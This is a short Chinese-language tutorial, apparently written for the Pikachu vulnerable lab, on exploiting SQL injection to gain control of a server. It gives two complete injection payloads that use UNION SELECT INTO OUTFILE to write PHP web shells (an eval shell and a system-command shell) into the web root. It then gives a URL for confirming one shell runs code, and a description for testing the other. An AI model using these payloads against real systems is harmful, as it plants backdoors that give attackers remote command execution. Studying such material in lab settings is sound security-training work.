sql远程服务器应用

 　　在配置好服务器和数据库权限后，通过在服务器上传一句话木马达到控制服务器的目的，在pikachu中文本注入输入以下语句，php语言为一句话木马，后面为在服务器生成1.php的文件，另外一句为生成2.PHP文件

kobe' union select "<?php @eval($_GET['test'])?>",2 into outfile "D:\\phpstudy_pro\\WWW\\pikachu\\1.php"#

kobe' union select "<?php system($_GET['cmd'])?>",2 into outfile "D:\\phpstudy_pro\\WWW\\pikachu\\2.php"#

 在网页端输入以下链接，当显示php版本后，确认木马已经注入

http://192.168.10.69/pikachu/1.php?test=phpinfo();

在网页端测试2.php情况，输入以下链接，当显示服务器IP等信息后，说明2.php注入成功（windows服务器查看IP地址的命令为ipconfig，linux服务器查看皮的命令为ifconfig）